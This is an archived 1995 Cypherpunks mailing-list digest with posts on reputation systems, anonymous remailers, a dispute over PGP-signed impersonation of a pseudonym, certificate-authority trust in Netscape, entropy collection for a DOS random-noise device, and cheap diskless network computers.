Subject: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.951128012308.9094C-100000@eskimo.com>


On Wed, 22 Nov 1995, Michael Froomkin wrote:

> This discussion puzzles me.  I thought we were bombarded with 
> reputational goods all the time:  brand names, stocks (what is a purchase 
> in the 2ndary market but a purchase of reputation most of the time?), 
> degrees from famous universities.  Anonymity compliates matters only if 
> no systems of unique ID is used.  Throw in digital signatures and we are 
> back at brand names, aren't we?

It's true that we deal routinely with reputations now.
However there is very little formal analysis of reputation as a concept.  
Although our common sense knowledge of reputations seem to serve 
us fairly well(*), there is no guarantee that it will scale well to an 
anonymous market where both the number of participants and the importance 
of reputation are much higher.

* However, the government apparently doesn't think so.  Witness the FDA and 
the SEC.

We need to have formal algorithms to deal with reputations, and we need 
to be able to show that they have desirable properties.  This will reduce 
transaction costs and help bring anonymous markets into the mainstream.  
Perhaps more importantly, good reputation algorithms will make 
agorics computing possible.  There is a very interesting proposal for a 
network routing system based on microcurrency and positive reputations 
(see http://www.webcom.com/agorics/dsr.html).  However it does not say 
what algorithms will be used to handle reputations.  If the system is 
actually implemented, its proper functioning will depend as much on the 
properties of the reputation algorithms used as on the correctness of its 
protocols.

Wei Dai





From hal9001 at panix.com  Tue Nov 28 04:26:03 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Tue, 28 Nov 1995 20:26:03 +0800
Subject: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <v02130500ace045aa0b50@[165.254.158.230]>


At 11:12 11/27/95, Dan Harmon wrote:

>One reason for the ssn's is that it maybe a LEA sponsered promo. If you a
>dumb enough to have a warrent or other some judgement against you and you
>give your ssn and address to a person or enity that you don't know then
>shame on you.


This reminds me of an incident that occurred in California last year. A
number of people received a notice that they had just won an
all-expenses-paid trip. Most of them turned up to get their gift only to
then discover that it was a Government Sting Operation and that the trip
was to Jail (they were all wanted on outstanding warrants which were
waiting for them when they arrived at the meeting site).







From pati at ipied.tu.ac.th  Tue Nov 28 04:31:27 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Tue, 28 Nov 1995 20:31:27 +0800
Subject: The future will be easy to use (fwd)
In-Reply-To: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951128151201.28240E-100000@ipied.tu.ac.th>


On Mon, 27 Nov 1995, John Young wrote:

> >Don't hold your breath. The current market surveys say 
> >that there is no  market for them. Check out this weeks 
> >PC Week or Mac Week, as they both  have several 
> >articles discussing this. Bottem line is that the under 
> >$1000  computer seems to have no future either in 
> >industry or the home.
> 
> Peter Lewis reports in today's NYT on "doubts about the fantasy 
> of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 

I was using a Commodore 64 and a 300 bps modem for networking to the old
online services of the day.  That whole setup cost less than 300 dollars
at the time, and had a disk drive too.  I guess it would be feasable to
make a really cheap machine, fit it with a more modern modem and connect
it to the internet.

I feel sad when they say that the market for <1000 $ machines is nill, I 
had so much fun and learned so much from my old machines.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------








From anonymous-remailer at shell.portal.com  Tue Nov 28 04:43:04 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 20:43:04 +0800
Subject: bit quiet in here lately
Message-ID: <199511281234.EAA17790@jobe.shell.portal.com>


On Fri, 24 Nov 1995, David K. Merriman wrote:

> At 02:11 AM 11/24/95 -0500, futplex wrote:
> >sameer writes:
> >> 	I am working on a spec which myself and others will turn into
> >> an internet draft, for placements on the standards track.  It will
> >> standardize remailer commands and nymserver commands, and will
> >> incorporate payment. Once we get a draft written up it will be posted
> >> for review, flames, and criticism.

      [snip to save bandwidth]

> Now, if the remailer service-listing operators could agree on a standard
> format for their reporting (lag time, feature lists, etc), then it would
> simplify maintaining a list of remailers - which would increase the
> usability of the remailer system, and help the use and growth of remailers.

The remailer operators can't even agree on a standard header syntax.  Some
support one header to request remailing, while others support another. 

I remember some time ago, that I was using a non-compliant (i.e. unique)
remailer located in Berkeley.  I was trying to post some information that
would have helped to expedite the FDA approved study on medicinal
marijuana. 

The article detailed that Health & Welfare Canada was growing a bumper
high-potency crop to help teach the Edmonton city police about the wicked 
weed.  Especially, cultivation techniques.

I thought that this might be "helpful" to the medicinal marijuana study. 
I thought that since the Canadian Government was granting licenses to
help law enforcement, that they might not be opposed to studying its
possible health benefits as well. 

(Canada's government funded health care system, could use some cost saving
measures.  If there is something useful there, it could help redirect
funding, and indirectly ameliorate the current waiting lists and service
cuts for all Canadians.)

I thought that the study organizers in the United States, MAPS I believe
 -- the ones who had complied with all US laws and regulations and permits
and headed up by a guy named, Rick Doblin, a fellow who's apparently
writing a thesis on Public Policy at the Kennedy School of Government at
Harvard -- I thought that the study organizers might be able to get what
they needed from the Canadian FDA equivalent, Health & Welfare, Canada. 

(Disclaimer: Unofficially, of course, not speaking for Health & Welfare 
Canada.  I have absolutely no connection with anyone, anywhere or 
anything at all in any possible form whatsoever.  In fact this post may 
well be the product of random typing by a simian life form.)

Silly me.

The damn post never was posted.  It was either editted out of the data
stream, or something else nefarious occurred. 

I mailed the remailer-operator about this, and asked: "What's the problem?"
And the remailer operator didn't reply to the message. 

*Sigh* 

Now, no-one in Berkeley, not a cypherpunk of all people, could be opposed
to seeing marijuana legalized, now could they??  I mean not, California,
eh?? 

Maybe, I just couldn't figure out how to post, and how to use a 
remailer.  I don't know.  Or maybe I had one too many beers and should've
stuck to having soda's.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S. (Come on down for a briefing to msri ... ya ... right ... 
        "persuasion" just isn't all that appetizing, Joe ... ;)  








From rah at shipwright.com  Tue Nov 28 04:55:16 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 28 Nov 1995 20:55:16 +0800
Subject: (fwd) Netscape V2 and Certificates
Message-ID: <v02120d06ace0b53ee92e@[199.0.65.105]>



--- begin forwarded text

From: John Hemming CEO MarketNet <JohnHemming at mkn.co.uk>
Date: Thu, 23 Nov 1995 18:54:36 PM PST
To: www-buyinfo at allegra.att.com
Mime-Version: 1.0
Subject: Netscape V2 and Certificates

We have now spent an interesting time looking at Netscape V2.

If you are interested in looking at V2 and how it relates to certificates
not signed by Verisign please take version 0.15b of Workhorse at
ftp://193.119.26.70/mktnet/pub/horse.zip  (Windows 3.1) switch on
the WWW server and try it out.

Basically the client allows an SSL link to a server "signed" by a CA
that it does not know ("EuroSign") the only problem being that if it
does not know the CA then it cannot check the signature.

I do think this is a major improvement, however, in that it raises
properly the issue of authentication of servers and makes it clear
that the client user should properly consider the server.

At the end of the day the commercial strengths of the server merchant and its
authorisation is more important than who has signed its certificate.  I can
happily obtain certificates for MarketNet even though there is a
US MarketNet Corp.  This is because I have a UK organisation called
MarketNet.  The name, therefore, is not in itself significant.

It is also interesting that Netscape will be checking the domain name in
the near future.  Realistically many people have a large number of
different domain names all pointing at the same server so a generic domain name
is likely to be the most common registration anyway.

At Eurosign.com we will be offering free Certification of a Keypair.  We
wish to ensure that further certification actually means something
commercially viable (eg a Bank regulated by the relevant organisation).
However, as our first offering we will be simply certifying that we have
received valid certificate requests. (they will be short term certs, however)

We have not fully allocated our domain name as yet (as far as I have
been told) although the experimental server (not advised for live use as
there are a number of flaws) was released today.  Eurosign's alpha
test site is at http://193.118.187.106/

--- end forwarded text


-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From wlkngowl at unix.asb.com  Tue Nov 28 05:47:42 1995
From: wlkngowl at unix.asb.com (wlkngowl at unix.asb.com)
Date: Tue, 28 Nov 1995 21:47:42 +0800
Subject: A random-noise sampling device for DOS
Message-ID: <DIr6B1.4yn@news2.new-york.net>



I'm working on a random noise sampling device for DOS, and so far have
a prototype version that samples the keyboard timings.  I'm unsure of
a good way to implement it...

Device timings (and in the future periodic samplings of the mouse
position or sound-card noise input) are put into a ring-buffer of raw
data and the output is a straight secure hash of it...  (when the
output buffer is used it, it just rehashes the data in the buffer at
the moment...)

I'm looking for some advice on how to determine when the raw data has
been "used up" and worth processing/encrypting before re-hashing it...

This in mind, offers for eventual beta-testers (annnouncement will
follow when it's ready), or suggestions for features (what to sample,
device interfaces) would be helpful.

Thanks in advance,

Rob <wlkngowl at unix.asb.com>







From perry at piermont.com  Tue Nov 28 05:54:10 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 21:54:10 +0800
Subject: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281340.IAA13518@jekyll.piermont.com>



Someone pretending to be Alice has said:
> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
[...]
> But I will simply repeat, I have never signed a post,

Perhaps *you* have never signed a post, but how do we know who *you*
are. You could be someone we've never heard from before. Anyone could
be putting the Alice de 'nonymous signature on the bottom of something
they've written. The only way to know for sure is digital signatures.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate. 

How do we know you aren't just spoofing us?

.pm





From perry at piermont.com  Tue Nov 28 06:19:42 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 22:19:42 +0800
Subject: A random-noise sampling device for DOS
In-Reply-To: <DIr6B1.4yn@news2.new-york.net>
Message-ID: <199511281407.JAA13573@jekyll.piermont.com>



wlkngowl at unix.asb.com writes:
> I'm working on a random noise sampling device for DOS, and so far have
> a prototype version that samples the keyboard timings.  I'm unsure of
> a good way to implement it...
> 
> Device timings (and in the future periodic samplings of the mouse
> position or sound-card noise input) are put into a ring-buffer of raw
> data and the output is a straight secure hash of it...  (when the
> output buffer is used it, it just rehashes the data in the buffer at
> the moment...)

Doesn't sound good.

> I'm looking for some advice on how to determine when the raw data has
> been "used up" and worth processing/encrypting before re-hashing it...

What I would suggest is accumulating enough data that you think you
have enough entropy for one hash function's worth of output, hash it,
and put that into an output queue. Then don't reuse the data, or if
you do, reuse it in combination with enough new data that you think
the new data has one hash function output's worth of entropy.

Perry





From anonymous-remailer at shell.portal.com  Tue Nov 28 06:22:44 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 22:22:44 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511281400.GAA22636@jobe.shell.portal.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 Nov 1995, an impostor posing as Alice de 'nonymous wrote:

> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> 
> > Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > > I have never signed any of my posts to this mailing list and frankly have
> > > no intention of beginning at this point.
> > 
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
> 
> Perry.  Normally I try my best to ignore you.
> 
> But I will simply repeat, I have never signed a post, and have no 
> intention of beginning to sign any posts, until I establish a secure 
> machine in a secure complex that is dedicated to that purpose.

This insistence on not making use of authentication tools at the same
time as whining about people spoofing you is what caused me to assume
your identity.  You were given ample warning.

Consider it a demonstration of why you should do just what you are
stubbornly refusing to do: generate yourself a damn key!

It is the best way to ensure a persistent persona whilst retaining
anonymity.

> I like to think that I take my security somewhat seriously.

For a purportedly security conscious impostor, you sure are reluctant
to make use of simple authentication tools.  Your risk assesment is
seriously out of whack too.

You do *not* need a secure machine to improve the level of
authentication of your posts: signing your posts would provide better
authentication than no authentication, even if the machine is not
tempest shielded, nor in a secure installation.

Finding your machine (we don't know remember), and installing a kernel
patch to catch your passphrase as it is typed in, or snag it from PGPs
core image is much harder to achieve, even if you are using a multi
user system.

PGP signing your post will give a much better authentication than
people who post from known email addresses; forgeries, and machine
breakins are not that hard to effect.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate.

Oh so you do care about authentication :-)

An offer: you post your own key, and I'll post a revocation.

You might find that people take you more seriously once they know they
are talking to a persistent persona.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLsT3obu8OQjKS7RAQE62gQAoTxWo6Dipa1bZeNi5NygZ/9CLJ2pn44s
KN2TFWY0n1KPC4tibEM88GOI7vHCCLE8t/XQ2zx5YArjd/7toCidAlUY07vQ6ums
sL4J8oV4JDKdpq9WTWaTS/unBww8qBJRVDBHigtiOneIkmu6kfuBEh0JR+a5plfQ
00GQ4SfcyBk=
=SAXZ
-----END PGP SIGNATURE-----






From Ted_Anderson at transarc.com  Tue Nov 28 06:31:54 1995
From: Ted_Anderson at transarc.com (Ted_Anderson at transarc.com)
Date: Tue, 28 Nov 1995 22:31:54 +0800
Subject: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <okilg2z0BwwMA0mAFp@transarc.com>


I am far behind in my C'punks reading and am likely to get farther
behind before I catch up, so perhaps this is well-known or dated. 
However, the recent revival of reputation discussion reminded me of a
very interesting claim made by Miller & Drexler in "Comparative Ecology:
A Computational Perspective"
(http://www.webcom.com/~agorics/agorpapers.html).  I'll quote from
section 4: 
> ... Trademarking of services and products enables producers to establish
> valuable reputations. The lack of this mechanism in biology [17]
> contributes to the relative sparseness of symbiosis there. 

> 4.4. Food webs and trade webs 

> Biological and market ecosystems both contain a mixture of symbiotic and
> negative-sum relationships. This paper argues that biological ecosystems
> involve more predation, while idealized market ecosystems involve more
> symbiosis. Indeed, one can make a case that this is so even for human
> market ecosystems-that biological ecosystems are, overall, dominated by
> predation, while market ecosystems are, overall, dominated by symbiosis. 

> In human markets (as in idealized markets) producers within an industry
> compete, but chains of symbiotic trade connect industry to industry.
> Competition in biology likewise occurs most often among those occupying
> the same niche, but here, it is predation that connects from niche to
> niche. Because of the lack of reputations and trademarks, symbiosis in
> biology occurs most often in situations where the "players" find
> themselves in a highly-iterated game. In the extreme, the symbiotic
> system itself becomes so tightly woven that it is considered a single
> organism-as with lichens composed of fungi and algae, or animals
> composed of eukaryotic cells containing mitochondria. Predation, of
> course, links one symbiotic island to the next. 

> Ecology textbooks show networks of predator-prey relationships-called
> food webs-because they are important to understanding ecosystems;
> "symbiosis webs" have found no comparable role. Economics textbooks show
> networks of trading relationships circling the globe; networks of
> predatory or negative-sum relationships have found no comparable role.
> (Even criminal networks typically form cooperative "black markets".) One
> cannot prove the absence of such spanning symbiotic webs in biology, or
> of negative-sum webs in the market; these systems are too complicated
> for any such proof. Instead, the argument here is evolutionary: that the
> concepts which come to dominate an evolved scientific field tend to
> reflect the phenomena which are actually relevant for understanding its
subject matter. 

> [17] Wickler, Wolfgang, Mimicry in Plants and Animals (World University
Library/ MaGraw-Hill, New York, 1968). 

This collection of Miller&Drexler papers is very much worth reading if
you haven't run across it yet. 

Ted 





From fletch at ain.bls.com  Tue Nov 28 07:21:18 1995
From: fletch at ain.bls.com (Mike Fletcher)
Date: Tue, 28 Nov 1995 23:21:18 +0800
Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <9511281504.AA26594@outland>



	Hi fellow PSX owner!  Tried WipEouT yet? :)

> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

	For those who don't know, the PSX is a CD based gaming console
released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

	As for serial port, why bother with the game port when there's
a serial I/O port on the back (the link cable that lets you hook two
PSXen up to play head to head (Mmmmm, Destruction Derby)).  What would be
_really_ spiffy would be for Sony (or a 3rd party) to put out a "hack disk"
(for lack of a better name) that would have a bare bones kernel that you
could then download stuff from another platform (gcc cross-compiled from
your linux box for example).  Like that'll happen.

	The line between toy and real machine is getting more and 
more fuzzy (we use a box here at work with the same processor to compile
for an AT&T telephony switch (which tells you how sad the AT&T product
is :) :))).  How long until the NSA tries a Chinese Lottery attack hidden
inside a Nintendo cart?

	Ah well, I've rambled enough.

---
Fletch                                                     __`'/|
fletch at ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------







From rajaram at morgan.com  Tue Nov 28 07:39:54 1995
From: rajaram at morgan.com (P. Rajaram)
Date: Tue, 28 Nov 1995 23:39:54 +0800
Subject: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <9511281004.ZM4257@morgan.com>


On Nov 27,  4:46pm, Jeff Weinstein wrote:
> Subject: Re: Certificate Authorities?

>   If you want a static list of CAs that netscape products
> will accept, you will be disappointed.  In the future
> there will be more commecial CAs, many companies will run
> their own internal CAs, and information providers will
> provide certs to their subscribers to handle access
> control to their sites.  It is a losing battle to try
> to maintain a static list of CAs.  IMHO, Going with a more
> dynamic, user configurable approach is the only way to
> keep up.

Yes.  But...
I deal with the security infrastructure for a large corporation.
I want only security administrators to configure the list of acceptable CAs.
I specifically do not want our users to be able to add new CAs
to the list of trusted "approved" CAs.

The concern is that some users who are not crypto enthusiasts may be
"social engineered" into adding a very liberal CA to their list.
Once this happens, the browser's signature verification capability
is totally compromised.

This is one of the reasons why PGP has not been adopted by many large
companies.  In response, Viacrypt now seems to have a product that
can restrict user modifications to the public keyring.

-raj





From cme at TIS.COM  Tue Nov 28 08:11:06 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 29 Nov 1995 00:11:06 +0800
Subject: Intelligence Community Massive Digital Data Systems Initiative
In-Reply-To: <199511272333.PAA12647@comsec.com>
Message-ID: <9511281542.AA09773@tis.com>


I think the real capacity measure is the number of satellite surveillance
images per day -- at their high resolution.  Anyone know that resolution?

 - Carl






From ecarp at netcom.com  Tue Nov 28 08:13:40 1995
From: ecarp at netcom.com (Ed Carp)
Date: Wed, 29 Nov 1995 00:13:40 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <199511281653.KAA23530@khijol>


> To:            stevenw at best.com (Steven Weller)
> Cc:            cypherpunks at toad.com
> Subject:       Re: The future will be easy to use (fwd) 
> Reply-to:      perry at piermont.com
> Date:          Tue, 28 Nov 1995 08:29:10 -0500
> From:          "Perry E. Metzger" <perry at piermont.com>

> 
> Steven Weller writes:
> > >Realisticaly, who in their right mind would buy a diskless workstation to
> > >connect to Internet?
> > 
> > The same sort of things could be said of the telephone compared with
> > written correspondence. Why would anyone have one in their business or
> > home? Anyone can overhear a conversation, people will just chat, the only
> > thing you can do with it is talk, there is no record of the correspondence,
> > why would anyone want to talk to people on the other side of town? etc.
> 
> This is different. In an era of distributed processing, they are
> returning you to the mainframe model. I don't see that this can work
> very well. Considering how much more powerful a $1000 machine is, why
> would you want something half that price that can do one hundredth as
> much for you?

I beg to differ.  Even though Larry Ellison's idea is silly, I don't 
see it as returning us to the mainframe model.  Rather, I see it as 
just a small step backwards.  Right now, I've got a 486/DX2-66 with a 
paltry 50 MB HD on my desk at work.  Most of its processing is done 
loading stuff off the LAN and running it locally.  The fact that I 
have a local disk nakes not the slightest bit of difference except a 
boot-time.

If the diskless workstation were to have *no* intelligence 
whatsoever, I'd agree with you.

As to diskless workstations being of no value, again, I'd have to 
disagree.  Diskless workstations, expecially X terminals that have a 
little NVRAM in them, have been rather popular for several years as a 
way to get graphical objects onto people's desks without having to 
shell out a ton of money in the process.  The only reason that 
they're getting less popular is that PC prices have fallen 
dramatically for the past several years, so much so that it's 
cost-effective to put a DX2-66 with 8 MB of RAM and a little disk (or 
no disk at all) on someone's desktop as opposed to something from 
Network General.

Me, I'm waiting for the day that someone gets clever and puts Linux 
into ROM. :)  Java is starting to get really hot, so much so that I 
was telling my spouse that if she wanted to learn Java, she'd have 
steady contracts in the next year or so, even in the sticks of Dallas 
;)  The point is, the market for a cheap, fast PC that will run 
applets *is* there, or will be soon.

I only hope that they make it upgradeable, so *I* can put that 5 GB 
array on it, and beef up the memory without having to take a second 
mortgage to do it.





From ecarp at netcom.com  Tue Nov 28 08:20:02 1995
From: ecarp at netcom.com (Ed Carp)
Date: Wed, 29 Nov 1995 00:20:02 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <199511281657.KAA23689@khijol>


Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
running it at home now (SLIPped into my Linux box), and I'd like to 
find a way to integrate PGP into Pegasus Mail.

Thanks in advance for any replies...

-- Ed Carp





From jya at pipeline.com  Tue Nov 28 08:50:29 1995
From: jya at pipeline.com (John Young)
Date: Wed, 29 Nov 1995 00:50:29 +0800
Subject: NAV_dat
Message-ID: <199511281635.LAA13666@pipe3.nyc.pipeline.com>


   Zero Kelvin crypto but The NYPaper hisses 28 Nov:

      The US Navy is starting to release a treasure trove of
      physical data about the sea that was gathered in secrecy
      during the long decades of the cold war, exciting
      scientists who see it as a bonanza for understanding
      environmental change. Over the decades, the Navy
      deployed thousands of ships, airplanes, submarines and
      satellites to collect such data. Usually kept secret,
      the archival readings are seen as unrivaled yardsticks
      for judging long-term processes of global climatic
      change and planetary warming. A geophysicist said the
      value of that data for scientific and commercial 
      exploitation is measured in billions of dollars.

   "Scientific Utility of Naval Environmental Data," a June,
   1995, 52-page appraisal by the Medea scientific advisory
   group, is available for free by telephoning (703) 883-5265
   voice or (703) 883-6190 fax.

   NAV_dat  (13 kb)













From lharrison at mhv.net  Tue Nov 28 09:52:28 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Wed, 29 Nov 1995 01:52:28 +0800
Subject: PGP hooks for Pegasus Mail?
Message-ID: <9511281715.AA23370@mhv.net>


At 09:52 AM 11/28/95 +0000, you wrote:
>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...


Ed -

  I haven't heard of anything re: "PGP hooks into Pegasus Mail".  At one
time, Eudora and ViaCrypt were discussing it but, from what I heard, those
discussions fizzled out.
  The easiest way to *integrate* is to use a front end program.

Regards -
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison at mhv.net         |      - Go to bed."
*******************************************************






From JonathanZ at consensus.com  Tue Nov 28 09:52:33 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Wed, 29 Nov 1995 01:52:33 +0800
Subject: The future will be easy to use
Message-ID: <v02120d00ace0f66694dc@[157.22.240.13]>


At 10:56 PM 11/26/95, James A. Donald wrote:
>At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
>> it
>> means forming a group, made up of Cypherpunk members perhaps, but much
>> smaller, and capable of working together. Also capable of handling not only
>> the theory, but good solid code, GUI, PR, meetings, talking to the
>> government, etc.
>
>Skip the talking to the government bit:  Ignore, do not confront.

I can't agree. The model of a successful enterprise includes feedback from
different levels of participants. Regardless, the government will be taking
a role in encryption. Thus even if they aren't a defining part of the
development, bringing them to a limited extent into the loop, and finding
even small areas which the government would support, helps provide better
buy-in by the government officials who participate, helping the momentum.

The point isn't to bring them into the design, but simply to use their
feedback to optimize our PR approach.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ at consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..







From perry at piermont.com  Tue Nov 28 10:11:06 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 02:11:06 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d00ace0f66694dc@[157.22.240.13]>
Message-ID: <199511281726.MAA00314@jekyll.piermont.com>



Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.

> Regardless, the government will be taking a role in encryption.

What makes you say that? Besides, why would that be desirable on any
level?

The Government will try to set standards and we will ignore them until
they try to force them on us by law, period.

Perry





From EALLENSMITH at ocelot.Rutgers.EDU  Tue Nov 28 10:32:01 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 02:32:01 +0800
Subject: The future will be easy to use
Message-ID: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>


From:	IN%"raph at c2.org"  "Raph Levien" 27-NOV-1995 17:11:37.38

It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter
Gutmann, and others have proved themselves quit capable of writing good
solid code. Sameer Parekh has done an incredible job with PR. Phil Karn,
Dan Bernstein, and some others (who I'm not sure want to be named) are
talking to the government. GUI I'm less sure about, but I'd hope that some
cpunks would come out of the woodwork.
------------------
	If you'd like a non-programmer user to test out the user interface, I'm
available to some degree if it's usable on a VAX (and to a lesser degree for
MS-DOS). Given the number of people like me who are interacting using a non-GUI
interface for various reasons (including using a mainframe for email), I would
suggest not making it specifically GUI-dependant.
	-Allen





From EALLENSMITH at ocelot.Rutgers.EDU  Tue Nov 28 10:33:58 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 02:33:58 +0800
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <01HY6DKHWT5S8WYPWJ@mbcl.rutgers.edu>


From:	IN%"frantz at netcom.com" 27-NOV-1995 02:55:15.66

Gresham's law says that the bad money drives the good money out of
circulation.  Does this mean that real cash is better than ecash ;-).
------------------
	You may realize this (due to the smiley), but what Gresham's law says
is that hard to distinguish bad money druves good money out of circulation. If
something is distinguishable, then it works the other way around (see the
replacement of the ruble by the dollar in pre-modern Russia, for instance).
	-Allen





From JonathanZ at consensus.com  Tue Nov 28 10:41:26 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Wed, 29 Nov 1995 02:41:26 +0800
Subject: The future will be easy to use
Message-ID: <v02120d02ace0fcab0df8@[157.22.240.13]>


At 9:26 AM 11/28/95, Perry E. Metzger wrote:
>Jonathan Zamick writes:
>> I can't agree. The model of a successful enterprise includes feedback from
>> different levels of participants.
>
>This isn't an enterprise. The government is not a participant except
>by their own desire to interfere.
>
>> Regardless, the government will be taking a role in encryption.
>
>What makes you say that? Besides, why would that be desirable on any
>level?
>
>The Government will try to set standards and we will ignore them until
>they try to force them on us by law, period.

This discussion was based on a group of people getting together to create
a new easy to use package for handling keys and such. The government is
going to try to take a dominant stance, and mandate elements of it. That
has to be assumed. Those elements we don't agree with will be ignored or
worked around (depending if its government opinion or government law.)
However, it is possible, even in an antagonistic relationship, to develop
positive feedback. I may be cracked, but I'd like to think that it would
be an advantage to find some area where the government and the Cypherpunk
members do agree, to minimize the conflict over the areas where we don't.

Still, this is getting past the original topic, and gets more into the
religious level of whether there can be any cooperation when the two
sides are Government and Good/Widespread Encryption. My stance is that
currently, no, but that doesn't preclude it in the future. Others don't
see it happening at all, or don't see it worth the investment to achieve.
That is perfectly valid.

---

Returning to the original topic though, do we want to get a smaller list
together to spec out some ideas for the project that was discussed? A
simple, transparent, tool which would allow people to use strong encryption
without having to think about it?

I don't have much time to contribute right now, but I can at least put
together the list, and some ideas.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ at consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page       ..







From perry at piermont.com  Tue Nov 28 10:41:36 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 29 Nov 1995 02:41:36 +0800
Subject: The future will be easy to use
In-Reply-To: <01HY6DPAY6HY8WYPWJ@mbcl.rutgers.edu>
Message-ID: <199511281748.MAA00358@jekyll.piermont.com>



"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.

.pm





From EALLENSMITH at ocelot.Rutgers.EDU  Tue Nov 28 10:51:34 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Wed, 29 Nov 1995 02:51:34 +0800
Subject: The future will be easy to use
Message-ID: <01HY6EC7T4JI8WYPWJ@mbcl.rutgers.edu>


From:	IN%"perry at piermont.com" 28-NOV-1995 12:49:12.47

"E. ALLEN SMITH" writes:
> Phil Karn, Dan Bernstein, and some others (who I'm not sure want to
> be named) are talking to the government.

If you call lawsuits "talking", not that talking is important.
-----------------
	Umm... I wasn't the one that wrote that. It was included in the
message to which I was replying.
	-Allen





From perry at piermont.com  Tue Nov 28 10:52:12 1995
From: perry at piermont.com (Perry E. Metzger)
